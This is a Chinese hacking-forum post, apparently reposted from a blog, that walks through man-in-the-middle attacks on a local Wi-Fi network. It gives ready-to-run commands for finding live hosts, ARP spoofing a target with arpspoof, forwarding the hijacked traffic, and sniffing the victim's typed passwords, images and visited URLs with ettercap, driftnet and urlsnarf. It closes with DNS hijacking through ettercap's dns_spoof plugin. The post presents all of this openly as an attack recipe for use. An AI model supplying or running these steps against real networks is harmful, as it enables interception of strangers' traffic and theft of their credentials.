跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

中间人攻击之dns劫持与ARP欺骗

精选回复

发布于

arp欺骗

首先连接wifi,进入内网

  • 1,查看内网的存活主机命令

    fping -asg 192.168.1.0/24

    也可以用nmap扫描

    nmap -T4 -A 192.168.1.0/24

    (视不同环境而定,假设这里的路由器地址为 192.168.1.1)
    也可利用其他工具查看其他主机,方法有很多

  • 2,arp欺骗
    命令

    arpspoof -i wlan0 -t 192.168.1.2(目标的内网地址) 192.168.1.1

    上面一句就对192.168.1.2实施了欺骗 ,此时该主机是断网的

  • 3,流量转发 我们将劫持到的流量通过自己发机器转发到受害人的机器上,让其恢复网络

转发命令

echo 1 >/proc/sys/net/ipv4/ip_forward   将参数换为1

这时可以启用 wireshark 抓包工具进行抓包
或者直接获取流量包

ettercap -Tq -i wlan0

这样被人输入密码后,我们就可以直接看到。
获取图片和浏览的网站

driftnet -i wlan0
urlsnarf -i wlan0

dns劫持

修改/etc/ettercap/etter.dns 添加自己的ip和劫持域名

03.png
开始进行DNS欺骗攻击:

ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.127.211// /192.168.127.2//

as.png
进行DNS 欺骗后,再次测试:ping www.sina.com.cn ,发现将www.sina.com.cn 解析指向了攻击者主机(192.168.127.208

01.png


版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/842.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。